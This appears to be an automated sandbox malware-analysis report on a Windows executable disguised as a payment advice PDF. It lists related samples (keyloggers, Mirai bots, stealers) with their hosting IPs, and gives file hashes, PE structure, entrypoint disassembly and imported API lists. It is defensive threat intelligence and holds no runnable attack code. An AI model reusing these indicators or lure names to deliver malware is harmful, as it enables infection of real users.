CLOUDFLARENETUS | G14yjXDQWf.exe | malicious | Snake Keylogger, VIP Keylogger
• 172.67.177.134
LINKNET-ID-APLinknetASNID | powerpc.nn.elf | malicious | Mirai, Okiru
• 139.43.38.141
LINKNET-ID-APLinknetASNID | botnet.m68k.elf | malicious | Mirai, Moobot
• 139.34.248.206
LINKNET-ID-APLinknetASNID | file.exe | malicious | LummaC, Amadey, Clipboard Hijacker, LummaC Stealer
• 103.21.221.64
LINKNET-ID-APLinknetASNID | botx.x86.elf | malicious | Mirai
• 139.40.24.215
LINKNET-ID-APLinknetASNID | loligang.ppc.elf | malicious | Mirai
• 139.0.5.101
LINKNET-ID-APLinknetASNID | nabx86.elf | malicious | Unknown
• 139.41.101.186
LINKNET-ID-APLinknetASNID | xobftuootu.elf | malicious | Unknown
• 139.66.166.95
LINKNET-ID-APLinknetASNID | x86_32.nn.elf | malicious | Mirai, Okiru
• 139.68.11.77
LINKNET-ID-APLinknetASNID | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer
• 103.21.221.87
LINKNET-ID-APLinknetASNID | splppc.elf | malicious | Unknown
• 139.40.118.68
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer
• 172.67.165.166
CLOUDFLARENETUS | ozctQoBg1o.exe | malicious | Snake Keylogger, VIP Keylogger
• 172.67.177.134
CLOUDFLARENETUS | SPhzvjk8wx.exe | malicious | Snake Keylogger, VIP Keylogger
• 104.21.67.152
CLOUDFLARENETUS | Q0Sh31btX8.exe | malicious | Snake Keylogger, VIP Keylogger
• 172.67.177.134
CLOUDFLARENETUS | o7H9XLUD9z.exe | malicious | Snake Keylogger, VIP Keylogger
• 104.21.67.152
CLOUDFLARENETUS | XE5p2qNoWt.exe | malicious | Lokibot, PureLog Stealer, zgRAT
• 104.21.12.202
CLOUDFLARENETUS | C9wUCfwfeT.exe | malicious | Lokibot, PureLog Stealer, zgRAT
• 104.21.73.230
CLOUDFLARENETUS | 764GVLyJne.exe | malicious | Snake Keylogger, VIP Keylogger
• 172.67.177.134
CLOUDFLARENETUS | lQyRqxe4dt.exe | malicious | Snake Keylogger, VIP Keylogger
• 172.67.177.134
CLOUDFLARENETUS | G14yjXDQWf.exe | malicious | Snake Keylogger, VIP Keylogger
• 172.67.177.134
                                                            INTERQGMOInternetIncJPhttps://www.bing.com/ck/a?!&&p=b3ddcc612c5f63024f18df0521265aa33742187d0b01744f07bf6348af8f753eJmltdHM9MTczMzE4NDAwMA&ptn=3&ver=2&hsh=4&fclid=26e9525e-8a77-6109-2437-46988be9608d&psq=superpitmachinery.com&u=a1aHR0cHM6Ly9zdXBlcnBpdG1hY2hpbmVyeS5jb20v&ntb/#fi-weixiang.ong@falconincorporation.comGet hashmaliciousUnknownBrowse
                                                            • 118.27.122.26
INTERQGMOInternetIncJP | teste.m68k.elf | malicious | Gafgyt, Mirai, Moobot, Okiru
• 150.95.219.245
INTERQGMOInternetIncJP | botx.arm.elf | malicious | Mirai
• 157.7.222.3
                                                            https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3DGet hashmaliciousUnknownBrowse
                                                            • 118.27.122.26
INTERQGMOInternetIncJP | REMITTANCE_PAYMENT54342Saic.html | malicious | Phisher
• 157.7.107.50
INTERQGMOInternetIncJP | Payment_Confirmation_pdf.exe | malicious | FormBook, PureLog Stealer
• 163.44.185.183
INTERQGMOInternetIncJP | la.bot.sh4.elf | malicious | Unknown
• 210.253.96.32
INTERQGMOInternetIncJP | DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer
• 163.44.185.183
INTERQGMOInternetIncJP | IETC-24017.exe | malicious | FormBook, PureLog Stealer
• 163.44.185.183
INTERQGMOInternetIncJP | SWIFT COPY 0028_pdf.exe | malicious | FormBook
• 163.44.185.183
No context
No context
Process: C:\Windows\SysWOW64\rasautou.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: modified
Size (bytes): 196608
Entropy (8bit): 1.1215420383712111
Encrypted: false
SSDEEP: 384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5: 9A809AD8B1FDDA60760BB6253358A1DB
SHA1: D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256: 95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512: 2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious: false
Reputation: moderate, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe
File Type: data
Category: modified
Size (bytes): 290304
Entropy (8bit): 7.995857345038708
Encrypted: true
SSDEEP: 6144:1iVtpkPdUYIu/BQALC7R+uC/z6F8t9q/MjsSGO71:MkGJxl70L/c8MFSGa1
MD5: BA2B84A19E0AF259CD4AC9D497938E1E
SHA1: 6ADCADBFFACDC735F4B277F1E5247FD8C5E4C7AD
SHA-256: 110AE6955A70789A883FDF4E00C27EDD95F16281E47C3925D82BEB95CB605748
SHA-512: C798479127481EFD5AB317AEE7692A599DB7D07892384239C739578CF64346ED12774EFC531CD103D62BB41132C7307CAC4AF6962955D88E472BA36C95964691
Malicious: false
Reputation: low
                                                            Preview:...RYD35J3OT..FG.U0XAS73.VKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD.5N3AK.DF.L...@....>"2g" 5#AT#.,5%$)3e7Ux3&Y.%8k...r7+WP`>B^oJFGEU0X8R>.q6,.z25.ySR.)...p& .O..oWT.L..n2=.a\-[r4,.FGEU0XASgvLV.@FRy.ie5N3OTKJF.EW1S@X73.RKAGRRZD35. OTKZFGE%4XASw3LFKAGPRZB35N3OTKLFGEU0XASG7LVIAGRRZD15..OT[JFWEU0XQS7#LVKAGRBZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKo37*.D35.iKTKZFGE.4XAC73LVKAGRRZD35N.OT+JFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKA
Process: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe
File Type: data
Category: dropped
Size (bytes): 290304
Entropy (8bit): 7.995857345038708
Encrypted: true
SSDEEP: 6144:1iVtpkPdUYIu/BQALC7R+uC/z6F8t9q/MjsSGO71:MkGJxl70L/c8MFSGa1
MD5: BA2B84A19E0AF259CD4AC9D497938E1E
SHA1: 6ADCADBFFACDC735F4B277F1E5247FD8C5E4C7AD
SHA-256: 110AE6955A70789A883FDF4E00C27EDD95F16281E47C3925D82BEB95CB605748
SHA-512: C798479127481EFD5AB317AEE7692A599DB7D07892384239C739578CF64346ED12774EFC531CD103D62BB41132C7307CAC4AF6962955D88E472BA36C95964691
Malicious: false
                                                            Preview:...RYD35J3OT..FG.U0XAS73.VKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD.5N3AK.DF.L...@....>"2g" 5#AT#.,5%$)3e7Ux3&Y.%8k...r7+WP`>B^oJFGEU0X8R>.q6,.z25.ySR.)...p& .O..oWT.L..n2=.a\-[r4,.FGEU0XASgvLV.@FRy.ie5N3OTKJF.EW1S@X73.RKAGRRZD35. OTKZFGE%4XASw3LFKAGPRZB35N3OTKLFGEU0XASG7LVIAGRRZD15..OT[JFWEU0XQS7#LVKAGRBZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKo37*.D35.iKTKZFGE.4XAC73LVKAGRRZD35N.OT+JFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKA
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.20885172122878
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: rPaymentAdviceNote_pdf.exe
File size: 1'226'752 bytes
MD5: c05461f24e430ecaf9b9106de5cafa70
SHA1: fc9e05b0c90db7a9f782908664d11fa2144abaed
SHA256: ce0b1bf28e5d0fc774caafecde07534057e36df193dc2ea9599e256a0b2f4a2c
SHA512: 1f796c023ce5a5b6def72b0ed67c9b13e6206cc00ffccf432e961d68c9f41790fae8ee2fb3fdf4243d649946212d6369ea971df3faa2ee59bb890076b103d458
SSDEEP: 24576:3u6J33O0c+JY5UZ+XC0kGso6FaCP37HU5KTp3UPxcIFCT8mnjHWY:Ru0c++OCvkGs9FaCQwmPWpT8UyY
TLSH: 5B45CF2273DDC360CB769173BF69B7016EBF38614630B95B2F880D7DA950162262D7A3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x427dcd
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x6751A3B6 [Thu Dec 5 12:59:34 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007FCF1CE625EAh
jmp 00007FCF1CE553B4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FCF1CE5553Ah
cmp edi, eax
jc 00007FCF1CE5589Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FCF1CE55539h
rep movsb
jmp 00007FCF1CE5584Ch
cmp ecx, 00000080h
jc 00007FCF1CE55704h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FCF1CE55540h
bt dword ptr [004BE324h], 01h
jc 00007FCF1CE55A10h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FCF1CE556DDh
test edi, 00000003h
jne 00007FCF1CE556EEh
test esi, 00000003h
jne 00007FCF1CE556CDh
bt edi, 02h
jnc 00007FCF1CE5553Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FCF1CE55543h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FCF1CE55595h
bt esi, 03h
jnc 00007FCF1CE555E8h
                                                            Programming Language:
                                                            • [ASM] VS2013 build 21005
                                                            • [ C ] VS2013 build 21005
                                                            • [C++] VS2013 build 21005
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [ASM] VS2013 UPD4 build 31101
                                                            • [RES] VS2013 build 21005
                                                            • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x62f74 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12a000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x62f74 | 0x63000 | 1f30e099ffe75f3ee00e7a86da46be2a | False | 0.933902008364899 | data | 7.906845238607475 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12a000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x5a23b | data | - | - | 1.0003277258803231
RT_GROUP_ICON | 0x1299f4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x129a6c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x129a80 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x129a94 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x129aa8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x129b84 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Imports
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
